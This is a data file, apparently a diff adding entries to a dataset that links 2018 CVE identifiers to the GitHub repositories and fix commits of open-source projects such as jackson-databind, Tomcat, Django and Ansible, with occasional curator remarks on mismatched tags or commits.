+CVE-2018-5773;https://github.com/trentm/python-markdown2;None:None;False;1fb702d650d35f7a6fee7f8dbe819e53ceaff53e,c86fce76472a8bb0b94f5396b3ca8db7d3591bcd,1b1dcdd727c0ef03453b9f5ef5ae3679f1d72323,9fc2a371d174b4f253c6b8985eedd41ce90e42f0; +CVE-2018-5968;https://github.com/FasterXML/jackson-databind;None:None;False;038b471e2efde2e8f96b4e0be958d3e5a1ff1d05; +CVE-2018-6333;https://github.com/facebookarchive/nuclide;None:None;False;65f6bbd683404be1bb569b8d1be84b5d4c74a324; +CVE-2018-6341;https://github.com/facebook/react;None:None;False;5b19684fc3eddb44a790f31804707de9234147c7,ff41519ec2fea37643ecae7f87f8e15856247faf; +CVE-2018-6517;https://github.com/puppetlabs/chloride;None:None;False;592b5730dd910a4eae7abf8c94f1a2d990411074,0c70420f3e6133ecaaa9bb9cb079dc55cacd8d17; +CVE-2018-6591;https://github.com/conversejs/converse.js;None:None;False;ba09996998df38a5eb76903457fbb1077caabe25; +CVE-2018-6596;https://github.com/anymail/django-anymail;None:None;False;c07998304b4a31df4c61deddcb03d3607a04691b,db586ede1fbb41dce21310ea28ae15a1cf1286c5; +CVE-2018-6873;https://github.com/auth0/auth0.js;None:None;False;c9c5bd414324fbab071aaa29dcc11af4ca73181b; vulnerable tag is fixed +CVE-2018-7212;https://github.com/sinatra/sinatra;None:None;False;6bcc6c3499b0fae52900ae31e63676a22d4e6a72,d17aa95f5056c52daf5d7c3170fbfd831dc96381,ba7af51bd713267910078d055d01469e836fd64f; advisory links the wrong commit +CVE-2018-7260;https://github.com/phpmyadmin/composer;None:None;False;d2886a3e8745e8845633ae8a0054b5ee4d8babd5; +CVE-2018-7408;https://github.com/npm/npm;None:None;False;74e149da6efe6ed89477faa81fef08eee7999ad0; +CVE-2018-7489;https://github.com/FasterXML/jackson-databind;None:None;False;6799f8f10cc78e9af6d443ed6982d00a13f2e7d2,e66c0a9d3c926ff1b63bf586c824ead1d02f2a3d; +CVE-2018-7560;https://github.com/myshenin/aws-lambda-multipart-parser;None:None;False;56ccb03af4dddebc2b2defb348b6558783d5757e; +CVE-2018-7575;https://github.com/tensorflow/tensorflow;None:None;False;32298e892ae8186fba54f58ecbace840ef65f635,2006ef57602012939dc10d7e8961925b320d3ef6,d107fee1e4a9a4462f01564798d345802acc2aef; +CVE-2018-7576;https://github.com/tensorflow/tensorflow;None:None;False;c48431588e7cf8aff61d4c299231e3e925144df8; was 1.6.0:1.7.0 +CVE-2018-7651;https://github.com/zkat/ssri;None:None;False;d0ebcdc22cb5c8f47f89716d08b3518b2485d65d; +CVE-2018-7711;https://github.com/simplesamlphp/saml2;None:None;False;93fef13dea9c46dc238eb59e414d3ae76559d8c4,5d69753a61b4bfb95eed3ea0c3f8cbb4e6e0ad2f,4f6af7f69f29df8555a18b9bb7b646906b45924d; +CVE-2018-7750;https://github.com/paramiko/paramiko;None:None;False;118c0ec84a60e6d6fa0034922f7cb5011d4a07d5,e9dfd854bdaf8af15d7834f7502a0451d217bb8c,fa29bd8446c8eab237f5187d28787727b4610516; +CVE-2018-7753;https://github.com/mozilla/bleach;None:None;False;c5df5789ec3471a31311f42c2d19fc2cf21b35ef; +CVE-2018-8006;https://github.com/apache/activemq;None:None;False;d8c80a98212ee5d73a281483a2f8b3f517465f62,2373aa1320dec90a60d69001adcb0ce856d61d10; +CVE-2018-8008;https://github.com/apache/storm;None:None;False;1117a37b01a1058897a34e11ff5156e465efb692,0fc6b522487c061f89e8cdacf09f722d3f20589a,efad4cca2d7d461f5f8c08a0d7b51fabeb82d0af,f61e5daf299d6c37c7ad65744d02556c94a16a4b; +CVE-2018-8009;https://github.com/apache/hadoop;None:None;False;eaa2b8035b584dfcf7c79a33484eb2dffd3fdb11,11a425d11a329010d0ff8255ecbcd1eb51b642e3,6d7d192e4799b51931e55217e02baec14d49607b,bd98d4e77cf9f7b2f4b1afb4d5e5bad0f6b2fde3,cedc28d4ab2a27ba47e15ab2711218d96ec88d23,65e55097da2bb3f2fbdf9ba1946da25fe58bec98,12258c7cff8d32710fbd8b9088a930e3ce27432e,1373e3d8ad60e4da721a292912cb69243bfdf470,6a4ae6f6eeed1392a4828a5721fa1499f65bdde4,fc4c20fc3469674cb584a4fb98bac7e3c2277c96,e3236a9680709de7a95ffbc11b20e1bdc95a8605,745f203e577bacb35b042206db94615141fa5e6f,45a1c680c276c4501402f7bc4cebcf85a6fbc7f5; +CVE-2018-8013;https://github.com/apache/xmlgraphics-batik;None:None;False;c5e5734293920250f2876648ac93660afc1d2923; +CVE-2018-8014;https://github.com/apache/tomcat;None:None;False;d83a76732e6804739b81d8b2056365307637b42d,5877390a9605f56d9bd6859a54ccbfb16374a78b,60f596a21fd6041335a3a1a4015d4512439cecb5; +CVE-2018-8016;https://github.com/apache/cassandra;None:None;False;28ee665b3c0c9238b61a871064f024d54cddcc79; +CVE-2018-8017;https://github.com/apache/tika;None:None;False;62926cae31a02d4f23d21148435804b96c543cc7,45a1c680c276c4501402f7bc4cebcf85a6fbc7f5; +CVE-2018-8025;https://github.com/apache/hbase;None:None;False;f6c4405929055c7e3d7135f49015dfac707c58d6,5f03fb399c13ff1eebf4067af6dc11cdded1694d,f7e50346322c6ba0ee46e64c07677e9ea052718e,7c1366de453989f115935c1db31d082d6ef3f868,30e98b4455f971c9cb3c02ac7b2daeebe4ee6f2d,bf25c1cb7221178388baaa58f0b16a408e151a69,625d4d002620139f49c8201f95b789b6a715cd41,dbebacbcfcbf66fbddb7e1b4a416c89e39831c5b,0c42acbdf86d08af3003105a26a2201f75f2e2c3; +CVE-2018-8026;https://github.com/apache/lucene-solr;None:None;False;e21d4937e0637c7b7949ac463f331da9a42c07f9,d1baf6ba593561f39e2da0a71a8440797005b55c,3aa6086ed99fa7158d423dc7c33dae6da466b093,e5407c5a9710247e5f728aae36224a245a51f0b1,1880d4824e6c5f98170b9a00aad1d437ee2aa12b; fixed version is vulnerable +CVE-2018-8027;https://github.com/apache/camel;None:None;False;24eefa559fe6b310629d2bf00663d2679ec81b96,3fe03e361725b66c1c3eaa40bb11577fb3dc17b3,8467d644813a62f3a836c0c7dee8cf5a41de3c07; +CVE-2018-8030;https://github.com/apache/qpid-broker-j;None:None;False;881323e56620ea069d52885842652a6fbf3403c0,025b48f3193e2b10b1c41d2bc3bcfc9cfc238a27; +CVE-2018-8031;https://github.com/apache/tomee;None:None;False;b8bbf50c23ce97dd64f3a5d77f78f84e47579863; +CVE-2018-8037;https://github.com/apache/tomcat;None:None;False;ed4b9d791f9470e4c3de691dd0153a9ce431701b,ccf2e6bf5205561ad18c2300153e9173ec509d73; was 9.0.9:9.0.10 +CVE-2018-8038;https://github.com/apache/cxf-fediz;None:None;False;4c396acb42439e61cc63b0452dd22442d720b61b,b6ed9865d0614332fa419fe4b6d0fe81bc2e660d; +CVE-2018-8039;https://github.com/apache/cxf;None:None;False;8ed6208f987ff72e4c4d2cf8a6b1ec9b27575d4b,fae6fabf9bd7647f5e9cb68897a7d72b545b741b; +CVE-2018-8088;https://github.com/qos-ch/slf4j;None:None;False;d2b27fba88e983f921558da27fc29b5f5d269405,c15d3c1dab0c3398011dec3a16ad3e45b75ae70d,918a055bdf87867f69693cf82727fa435c489e25; tracer commit misses the good one +CVE-2018-8097;https://github.com/pyeve/eve;None:None;False;57c320b925164dbc579355b0a06affa903f2ca1f,f8f7019ffdf9b4e05faf95e1f04e204aa4c91f98; +CVE-2018-8128;https://github.com/chakra-core/ChakraCore;None:None;False;23848b1272067625ab50115c6f30a0b177c633ba; +CVE-2018-8177;https://github.com/chakra-core/ChakraCore;None:None;False;eb4b00bcd61a56d5ac66f4155870cba3178d3273; +CVE-2018-8178;https://github.com/chakra-core/ChakraCore;None:None;False;c8f723d99c484c3a31df2187cdd2893ac27506a3; +CVE-2018-8315;https://github.com/Microsoft/ChakraCore;None:None;False;e03b3e30160ac5846b246931634962ce6bd1db83; +CVE-2018-8359;https://github.com/chakra-core/ChakraCore;None:None;False;f8bdb180c4e9351f441e25dc818815d0c63af753; +CVE-2018-8381;https://github.com/chakra-core/ChakraCore;None:None;False;1b77d559416116f9719febb7dee3354150277588; +CVE-2018-8390;https://github.com/chakra-core/ChakraCore;None:None;False;63ae30a750a4a0b2a2eb61a35dd3d2fc10104a90; +CVE-2018-8416;https://github.com/dotnet/corefx;None:None;False;dabb4f5dc837550dc6835a7be9a6db8b8fd5fdc7,85b40be5e2df53df1b667442c0717242266d7b3f,c50af3eee993880dc31877dd596356639b2ee1f0,a0fcd23ace1c8d692988cd0da4391cf7bf5e0ce6; vulnerable tag is fixed +CVE-2018-8465;https://github.com/chakra-core/ChakraCore;None:None;False;7e235c914df50f4bb42efad55a7527350a7cc7ae; +CVE-2018-8473;https://github.com/Microsoft/ChakraCore;None:None;False;a27864395a53f0ebe27a71a004265c28383a4385; +CVE-2018-8510;https://github.com/chakra-core/ChakraCore;None:None;False;9b36ce832c9a81bb51e3b1a39067feadcd1e14d2; +CVE-2018-8541;https://github.com/chakra-core/ChakraCore;None:None;False;3bee8f018e15c803d87d8b2981d0522f6d58ecac; +CVE-2018-8899;https://github.com/IdentityServer/IdentityServer4;None:None;False;ce8a487521f87b8593bfb0cab14d7ebaed42079b,21d0da227f50ac102de469a13bc5a15d2cc0f895; +CVE-2018-9109;https://github.com/Studio-42/elFinder;None:None;False;157f471d7e48f190f74e66eb5bc73360b5352fd3; +CVE-2018-9110;https://github.com/Studio-42/elFinder;None:None;False;e6351557b86cc10a7651253d2d2aff7f6b918f8e; +CVE-2018-9206;https://github.com/blueimp/jQuery-File-Upload;None:None;False;aeb47e51c67df8a504b7726595576c1c66b5dc2f; +CVE-2018-9856;https://github.com/Kotti/Kotti;None:None;False;00b56681fa9fb8587869a5e00dcd56503081d3b9,69d3c8a5d7203ddaec5ced5901acf87baddd76be; +CVE-2018-10055;https://github.com/tensorflow/tensorflow;None:None;False;111e04aed22fdeed494580dae127720326c1b8ee,3c1d5bc91be37396c73060bf123ead784741c6ef,3a279f15fde94882c27670dee313ce501cba92b9,c89ab82a82585cdaa90bf4911980e9e845909e78; +CVE-2018-10092;https://github.com/Dolibarr/dolibarr;None:None;False;5d121b2d3ae2a95abebc9dc31e4782cbc61a1f39; +CVE-2018-10094;https://github.com/Dolibarr/dolibarr;None:None;False;7ade4e37f24d6859987bb9f6232f604325633fdd; +CVE-2018-10095;https://github.com/Dolibarr/dolibarr;None:None;False;1dc466e1fb687cfe647de4af891720419823ed56; +CVE-2018-10188;https://github.com/phpmyadmin/phpmyadmin;None:None;False;c6dd6b56e236a3aff953cee4135ecaa67130e641; +CVE-2018-10237;https://github.com/google/guava;None:None;False;7ec8718f1e6e2814dabaa4b9f96b6b33a813101c,f89ece5721b2f637fe754937ff1f3c86d80bb196; +CVE-2018-10366;https://github.com/rainlab/user-plugin;None:None;False;098c2bc907443d67e9e18645f850e3de42941d20; +CVE-2018-10862;https://github.com/wildfly/wildfly-core;None:None;False;77ea76eb5651ed1daf40a681a990bb65018d9535,40996ae6d5d3b6c1602a15f96b86a8d8a39b53eb; +CVE-2018-10903;https://github.com/pyca/cryptography;None:None;False;d4378e42937b56f473ddade2667f919ce32208cb; +CVE-2018-10912;https://github.com/keycloak/keycloak;None:None;False;40d129cf541e85e8d0d04a990be6e7954a0a5d2b,c64ecb1ab84e66fcb486423c1978d3b83852e8d2; +CVE-2018-10936;https://github.com/pgjdbc/pgjdbc;None:None;False;cdeeaca47dc3bc6f727c79a582c9e4123099526e; +CVE-2018-11039;https://github.com/spring-projects/spring-framework;None:None;False;dac97f1b7dac3e70ff603fb6fc9f205b95dd6b01,f2694a8ed93f1f63f87ce45d0bb638478b426acd,323ccf99e575343f63d56e229c25c35c170b7ec1; +CVE-2018-11040;https://github.com/spring-projects/spring-framework;None:None;False;b80c13b722bb207ddf43f53a007ee3ddc1dd2e26,874859493bbda59739c38c7e52eb3625f247b93a; +CVE-2018-11087;https://github.com/spring-projects/spring-amqp;None:None;False;444b74e95bb299af5e23ebf006fbb45d574fb95e,d64e7fa3993dac577c0973e0caf8c31d27ef5e44; +CVE-2018-11093;https://github.com/ckeditor/ckeditor5-link;None:None;False;8cb782eceba10fc481e4021cb5d25b2a85d1b04e; +CVE-2018-11248;https://github.com/lingochamp/FileDownloader;None:None;False;e8dd7724c9243b21181eb3d27a1715ed811ccfde,ff240b883490a84744705f9b4165719d7633f902,b023cc081bbecdd2a9f3549a3ae5c12a9647ed7f; +CVE-2018-11307;https://github.com/FasterXML/jackson-databind;None:None;False;27b4defc270454dea6842bd9279f17387eceb737,051bd5e447fbc9539e12a4fe90eb989dba0c656e,78e78738d69adcb59fdac9fc12d9053ce8809f3d; +CVE-2018-11627;https://github.com/sinatra/sinatra;None:None;False;12786867d6faaceaec62c7c2cb5b0e2dc074d71a,3742bddcee8eb5afd69cf51327c1716c506e1adc; +CVE-2018-11647;https://github.com/jaredhanson/oauth2orize-fprm;None:None;False;2bf9faee787eb004abbdfb6f4cc2fb06653defd5,d48b4dd0e5a25ee2094725d98c35e468f027afd8; +CVE-2018-11758;https://github.com/apache/cayenne;None:None;False;6fc896b65ed871be33dcf453cde924bf73cf83db,8d4c83abed024fc3a698148a122429022b89b590; +CVE-2018-11761;https://github.com/apache/tika;None:None;False;4e67928412ad56333d400f3728ecdb59d07d9d63,148adec1016acc122fa5e972f75d7029376998d9,bd9d75d8b0a85af2937047bfad04288c3044b2a6; +CVE-2018-11762;https://github.com/apache/tika;None:None;False;a09d853dbed712f644e274b497cce254f3189d57,c0fb57d9d20e8eb7cb77bce8742e4566a18f5db8; +CVE-2018-11771;https://github.com/apache/commons-compress;None:None;False;a41ce6892cb0590b2e658704434ac0dbcb6834c8; +CVE-2018-11775;https://github.com/apache/activemq;None:None;False;02971a40e281713a8397d3a1809c164b594abfbb,1e31df9800fc2db258f2458628bd9863c11b2846,69fad2a135689f6c31fbada1c397f2e0dfd90d3c,bde7097fb8173cf871827df7811b3865679b963d; +CVE-2018-11777;https://github.com/apache/hive;None:None;False;f0419dfaabe31dd7802c37aeebab101265907e1a,00c0ee7bc4b8492476b377a6edafcc33411f14b6,1a1d6ca1bc3ae840238dc345fa1eb2c7c28c8cb0; +CVE-2018-11784;https://github.com/apache/tomcat;None:None;False;efb860b3ff8ebcf606199b8d0d432f76898040da; +CVE-2018-11786;https://github.com/apache/karaf;None:None;False;103f33105a58c899706a0687bb334678e2fa1ee7,24fb477ea886e8f294dedbad98d2a2c4cb2a44f9; +CVE-2018-11787;https://github.com/apache/karaf;None:None;False;cfa213ad680ded70b70bf0c648891a06386ef632,434e52502528e91e20d2f87cec7732f1e6e554c2,1fc60d7792e1aa35970b8d967f88ca3381053172; +CVE-2018-11788;https://github.com/apache/karaf;None:None;False;cc3332e97fa53a579312894d08e383f321a96aed,0c36c50bc158739c8fc8543122a6740c54adafca; +CVE-2018-11797;https://github.com/apache/pdfbox;None:None;False;ea7d321b6e23cf017437846bcee4de19784cf6c8,bb5defd088bebd566d126df079d35b356ba0534a,2db39c139d935a8ba03e1ae3c012d2d41dd6912a; +CVE-2018-11798;https://github.com/apache/thrift;None:None;False;2a2b72f6c8aef200ecee4984f011e06052288ff2; +CVE-2018-11804;https://github.com/apache/spark;None:None;False;c21d7e1bb958a0cfa4cba34a688d594466088c9e,ac586bbb016d70c60b1bd2ea5320fd56c3a8eead,8906696ac2089f3d6500b0496af7d9995c7de99b,d7a35877b96dce8b742acf77e79bda189e402ae2; commits do not have tags,wrong versions, only 2.x.y are affected according to spark advisory +CVE-2018-12022;https://github.com/FasterXML/jackson-databind;None:None;False;7487cf7eb14be2f65a1eb108e8629c07ef45e0a1,28badf7ef60ac3e7ef151cd8e8ec010b8479226a; +CVE-2018-12023;https://github.com/FasterXML/jackson-databind;None:None;False;7487cf7eb14be2f65a1eb108e8629c07ef45e0a1,28badf7ef60ac3e7ef151cd8e8ec010b8479226a; +CVE-2018-12043;https://github.com/symphonycms/symphonycms;None:None;False;1ace6b31867cc83267b3550686271c9c65ac3ec0; +CVE-2018-12418;https://github.com/junrar/junrar;None:None;False;ad8d0ba8e155630da8a1215cee3f253e0af45817; +CVE-2018-12537;https://github.com/eclipse-vertx/vert.x;None:None;False;3a6512695a9d610687081eb13d2a1681151fd7fb,1bb6445226c39a95e7d07ce3caaf56828e8aab72; +CVE-2018-12540;https://github.com/vert-x3/vertx-web;None:None;False;f42b193b15a29b772fc576b2d0f2497e7474a7e9,98891b1d9e022b467a3e4674aca4d1889849b1d5; +CVE-2018-12541;https://github.com/eclipse-vertx/vert.x;None:None;False;269a583330695d1418a4f5578f7169350b2e1332; +CVE-2018-12544;https://github.com/vert-x3/vertx-web;None:None;False;ea0b0930fbc122b7114935cafa379facc9611587,3fcb0036dc11f22ea232f61cfff31b29a6b6eca4,26db16c7b32e655b489d1a71605f9a785f788e41,ac8692c618d6180a9bc012a2ac8dbec821b1a973,d814d22ade14bafec47c4447a4ba9bff090f05e8; +CVE-2018-12557;https://github.com/openstack-infra/zuul;None:None;False;ffe7278c08e6e36bf8b18f732c764e00ff51551e; +CVE-2018-12608;https://github.com/moby/moby;None:None;False;ddd5278b07b1c2b12b906244153fd9340e0d7910,190c6e8cf8b893874a33d83f78307f1bed0bfbcd; +CVE-2018-12615;https://github.com/phusion/passenger;None:None;False;4e97fdb86d0a0141ec9a052c6e691fcd07bb45c8; +CVE-2018-12976;https://github.com/golang/gddo;None:None;False;daffe1f90ec57f8ed69464f9094753fc6452e983; +CVE-2018-13447;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; +CVE-2018-13448;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; +CVE-2018-13449;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; +CVE-2018-13450;https://github.com/Dolibarr/dolibarr;None:None;False;36402c22eef49d60edd73a2f312f8e28fe0bd1cb; +CVE-2018-13790;https://github.com/concretecms/concretecms;None:None;False;dc742c1ec83b992cd02d70ae19ee190bbed0b3e8; +CVE-2018-13797;https://github.com/scravy/node-macaddress;None:None;False;358fd594adb196a86b94ac9c691f69fe5dad2332; +CVE-2018-13818;https://github.com/twigphp/Twig;None:None;False;eddb97148ad779f27e670e1e3f19fb323aedafeb; +CVE-2018-13863;https://github.com/mongodb/js-bson;None:None;False;511ecc487ea57f554a0d199206a58efbc9cd121c,bd61c45157c53a1698ff23770160cf4783e9ea4a; +CVE-2018-14040;https://github.com/twbs/bootstrap;None:None;False;2a5ba23ce8f041f3548317acc992ed8a736b609d,149096016f70fd815540d62c0989fd99cdc809e0; +CVE-2018-14041;https://github.com/twbs/bootstrap;None:None;False;cc61edfa8af7b5ec9d4888c59bf94377e499b78b; +CVE-2018-14042;https://github.com/twbs/bootstrap;None:None;False;2d90d369bbc2bd2647620246c55cec8c4705e3d0; +CVE-2018-14371;https://github.com/eclipse-ee4j/mojarra;None:None;False;475c71e282d695fbbb1946a75e267d1b8d9d7503,1b434748d9239f42eae8aa7d37d7a0930c061e24; +CVE-2018-14574;https://github.com/django/django;None:None;False;a656a681272f8f3734b6eb38e9a88aa0d91806f1,d6eaee092709aad477a9894598496c6deec532ff,c4e5ff7fdb5fce447675e90291fd33fddd052b3c,6fffc3c6d420e44f4029d5643f38d00a39b08525; +CVE-2018-14635;https://github.com/openstack/neutron;None:None;False;13631ff187b6c2c6eec4f356a917288560dc5886,54aa6e81cb17b33ce4d5d469cc11dec2869c762d,8287d7f546e4ffe7a2ac32df50d6b465484f81cc,988eceac27a9ad91775376b3b3fedf84963663a5,c1d2f13495b2eb925be6495840795ead5929fd0e,773c5595b5c79b216d37787fd2ba5a989d48868a; +CVE-2018-14637;https://github.com/keycloak/keycloak;None:None;False;0fe0b875d63cce3d2855d85d25bb8757bce13eb1; +CVE-2018-14642;https://github.com/undertow-io/undertow;None:None;False;dc22648efe16968242df5d793e3418afafcb36c0,c46b7b49c5a561731c84a76ee52244369af1af8a; +CVE-2018-14718;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; +CVE-2018-14719;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; +CVE-2018-14720;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; +CVE-2018-14721;https://github.com/FasterXML/jackson-databind;None:None;False;87d29af25e82a249ea15858e2d4ecbf64091db44; +CVE-2018-14731;https://github.com/parcel-bundler/parcel;None:None;False;066e0bf6bd26b15c78bd47df023452e4b20073e4,92b5c0830662f8baebc6fd4eadfd5ddd3de963a3; +CVE-2018-14732;https://github.com/webpack/webpack-dev-server;None:None;False;f18e5adf123221a1015be63e1ca2491ca45b8d10,b3217ca8dc6b371a160b6749b949ab09d7b9f6d7,c42d0da513ac6ee0b48a17b0f6b7830da7c9c2c9; +CVE-2018-14774;https://github.com/symfony/symfony;None:None;False;9cfcaba0bf71f87683510b5f47ebaac5f5d6a5ba,08a32d44b62275b3c6499493dd95e099c84daf60,0f7667d6430eb6529d84a29d7aa83991d1ac4fd0,67044af83d61cfef81349c7add4ade5369acf339,96504fb8c9f91204727d2930eb837473ce154956,1db2d2eda82c8bc031ccd9b85326c0860e5899a2,7f912bbb78377c2ea331b3da28363435fbd91337,974240e178bb01d734bf1df1ad5c3beba6a2f982,bcf5897bb1a99d4acae8bf7b73e81bfdeaac0922,725dee4cd8b4ccd52e335ae4b4522242cea9bd4a; +CVE-2018-14840;https://github.com/intelliants/subrion;None:None;False;b12e287d3814c0f2d0b1892f95fc0190972d2ba5; +CVE-2018-15178;https://github.com/gogs/gogs;None:None;False;1f247cf8139cb483276cd8dd06385a800ce9d4b2; +CVE-2018-15531;https://github.com/javamelody/javamelody;None:None;False;ef111822562d0b9365bd3e671a75b65bd0613353; +CVE-2018-15727;https://github.com/grafana/grafana;None:None;False;df83bf10a225811927644bdf6265fa80bdea9137,7baecf0d0deae0d865e45cf03e082bc0db3f28c3,92ed1f04afcdead02fe3a8bf53caecc89db1c5dc; +CVE-2018-15756;https://github.com/spring-projects/spring-framework;None:None;False;423aa28ed584b4ff6e5bad218c09beef5e91951e,044772641d12b9281185f6cf50f8485b8747132c,c8e320019ffe7298fc4cbeeb194b2bfd6389b6d9; +CVE-2018-15758;https://github.com/spring-projects/spring-security-oauth;None:None;False;ddd65cd9417ae1e4a69e4193a622300db38e2ef1,4082ec7ae3d39198a47b5c803ccb20dacefb0b09,f92223afc71687bd3156298054903f50aa71fbf9; +CVE-2018-16329;https://github.com/ImageMagick/ImageMagick;None:None;False;2c75f301d9ac84f91071393b02d8c88c8341c91c; +CVE-2018-16459;https://github.com/exceljs/exceljs;None:None;False;9066cd89a9fad055166b53ce9e75a42e7636bac1; +CVE-2018-16462;https://github.com/vincentmorneau/apex-publish-static-files;None:None;False;2209af8f2b65c24aa55ab757e0e05b958c16f063; +CVE-2018-16468;https://github.com/flavorjones/loofah;None:None;False;71e4b5434fbcb2ad87643f0c9fecfc3a847943c4,be0fd3ac0fad452730f10e318fa31706257fd081; +CVE-2018-16470;https://github.com/rack/rack;None:None;False;37c1160b2360074d20858792f23a7eb3afeabebd; +CVE-2018-16471;https://github.com/rack/rack;None:None;False;97ca63d87d88b4088fb1995b14103d4fe6a5e594,313dd6a05a5924ed6c82072299c53fed09e39ae7,e5d58031b766e49687157b45edab1b8457d972bd; +CVE-2018-16472;https://github.com/ashaffer/cached-path-relative;None:None;False;a43cffec84ed0e9eceecb43b534b6937a8028fc0; +CVE-2018-16485;https://github.com/nunnly/m-server;None:None;False;01f13f040d1961ca3146dce7e2db990156e65e9a; tag-to-version gets the wrong next tag it should stay empty. The commit has no tag +CVE-2018-16490;https://github.com/aheckmann/mpath;None:None;False;fe732eb05adebe29d1d741bdf3981afbae8ea94d; +CVE-2018-16492;https://github.com/justmoon/node-extend;None:None;False;0e68e71d93507fcc391e398bc84abd0666b28190; +CVE-2018-16733;https://github.com/ethereum/go-ethereum;None:None;False;106d196ec4a6451efedc60ab15957f231fa85639,ecca49e078ace5f867cccdf5c291e3e84dc19982; +CVE-2018-16837;https://github.com/ansible/ansible;None:None;False;a0aa53d1a1d6075a7ae98ace138712ee6cb45ae4,b618339c321c387230d3ea523e80ad47af3de5cf,f50cc0b8cb399bb7b7c1ad23b94c9404f0cc6d23,77928e6c3a2ad878b20312ce5d74d9d7741e0df0; version retrieved from redhat otherwise there were none in the NVD +CVE-2018-16859;https://github.com/ansible/ansible;None:None;False;0d746b4198abf84290a093b83cf02b4203d73d9f,4d748d34f9392aa469da00a85c8e2d5fe6cec52b,2f8d3fcf41107efafc14d51ab6e14531ca8f8c87,8c1f701e6e9df29fe991f98265e2dd76acca4b8c; vulnerable tag is fixed +CVE-2018-16876;https://github.com/ansible/ansible;None:None;False;0954942dfdc563f80fd3e388f550aa165ec931da,424c68f15ad9f532d73e5afed33ff477f54281a7,e0a81d133ffc8f7067182c53cf6a28c724dd1099,ba4c2ebeac9ee801bfedff05f504c71da0dd2bc2; +CVE-2018-16886;https://github.com/etcd-io/etcd;None:None;False;c7f744d6d373e91cc300cd73de9d00b6166f36f1,a2b420c3642a3e4dfefccf3a2ef5b57906206ed9,bf9d0d8291dc71ecbfb2690612954e1a298154b2; +CVE-2018-16984;https://github.com/django/django;None:None;False;bf39978a53f117ca02e9a0c78b76664a41a54745,c4bd5b597e0aa2432e4c867b86650f18af117851; +CVE-2018-17057;https://github.com/tecnickcom/TCPDF;None:None;False;ac6e92fccc7d9383dfd787056831349621b1aca2,1861e33fe05f653b67d070f7c106463e7a5c26ed; +CVE-2018-17104;https://github.com/microweber/microweber;None:None;False;982ea9d5efb7d2306a05644ebc3469dadb33767e; +CVE-2018-17175;https://github.com/marshmallow-code/marshmallow;None:None;False;d5d9cb22dda6f39117f6f9497a6a66813cb8c64f,98f2b4759c9a7c7ac5e790727d47f2b328520713; +CVE-2018-17184;https://github.com/apache/syncope;None:None;False;73aed0a741b1255f45893e3cada6501473350738,36fb466afd64894170fa5e2e030ce6895120b1af,b25a8834db2cc7ea45707a1218e85e0475684270; +CVE-2018-17187;https://github.com/apache/qpid-proton-j;None:None;False;0cb8ca03cec42120dcfc434561592d89a89a805e; +CVE-2018-17193;https://github.com/apache/nifi;None:None;False;e62aa0252dfcf34dff0c3a9c51265b1d0f9dfc9f; +CVE-2018-17194;https://github.com/apache/nifi;None:None;False;748cf745628dab20b7e71f12b5dcfe6ed0bbf134; +CVE-2018-17195;https://github.com/apache/nifi;None:None;False;246c090526143943557b15868db6e8fe3fb30cf6; +CVE-2018-17197;https://github.com/apache/tika;None:None;False;0c49c851979163334ea05cbebdd11ff87feba62d; +CVE-2018-17246;https://github.com/elastic/kibana;None:None;False;9b78cfd4b971df4852c77306e062ef0ccbf2186c,51aff7d3c49724fcbaba4353dff0cd7c3be799b0,22ba11eb525a2045d43307177081047f8a7a3dab,bc6a68529fc72b704b11871bfb11a51bdc724cbf; +CVE-2018-17419;https://github.com/miekg/dns;None:None;False;501e858f679edecd4a38a86317ce50271014a80d; my bad, wrong pick and they were inverted +CVE-2018-18074;https://github.com/psf/requests;None:None;False;3331e2aecdbf575dd60abef4df79c52d78610a83,c45d7c49ea75133e52ab22a8e9e13173938e36ff; +CVE-2018-18206;https://github.com/Bytom/bytom;None:None;False;a79fbcb71c138a499166c802d9f6af5c2ea18253,1ac3c8ac4f2b1e1df9675228290bda6b9586ba42; +CVE-2018-18389;https://github.com/neo4j/neo4j;None:None;False;46de5d01ae2741ffe04c36270fc62c6d490f65c9; +CVE-2018-18476;https://github.com/nedap/mysql-binuuid-rails;None:None;False;9ae920951b46ff0163b16c55d744e89acb1036d4; +CVE-2018-18854;https://github.com/spray/spray-json;None:None;False;855b35e6d65079085d580ab3063637d94c8f3e0a,c8e106fe41dad3916d54dcbf90e3aa5599d4d461; +CVE-2018-18893;https://github.com/HubSpot/jinjava;None:None;False;4f28830ef9883e2c4e2a92a0d37b93c8620de2f7,c13927db0fb7bb3b567469f125be8000f8cbf601; +CVE-2018-18926;https://github.com/go-gitea/gitea;None:None;False;aeb5655c25053bdcd7eee94ea37df88468374162,582213a858d936b4a55ad2416fd0615e78edc247,84829fba82741b5a0a882a9f1e95ea3651fc3ae7; vulnerable tag is fixed +CVE-2018-19048;https://github.com/mycolorway/simditor;None:None;False;ef01a643cbb7f8163535d6bfb71135f80ec6a6fd; +CVE-2018-19133;https://github.com/flarum/core;None:None;False;0536b208e1c31d5c9911d231413f2d1a66683f70,e99f7fcdace74211bec5627e6adf20ddf7dad2a7; +CVE-2018-19184;https://github.com/ethereum/go-ethereum;None:None;False;83e2761c3a13524bd5d6597ac08994488cf872ef; vulnerable tag is fixed +CVE-2018-19351;https://github.com/jupyter/notebook;None:None;False;4026ef01077d2e313a22b371fae2705196b8161d,107a89fce5f413fb5728c1c5d2c7788e1fb17491; +CVE-2018-19352;https://github.com/jupyter/notebook;None:None;False;288b73e1edbf527740e273fcc69b889460871648,ad25be985c55f66ef2105f712cb915708d568e29; +CVE-2018-19360;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; +CVE-2018-19361;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; +CVE-2018-19362;https://github.com/FasterXML/jackson-databind;None:None;False;42912cac4753f3f718ece875e4d486f8264c2f2b; +CVE-2018-19370;https://github.com/Yoast/wordpress-seo;None:None;False;3bfa70a143f5ea3ee1934f3a1703bb5caf139ffa,3bc687351bc9a8c9c8c6bb8dbf048184075240a3; 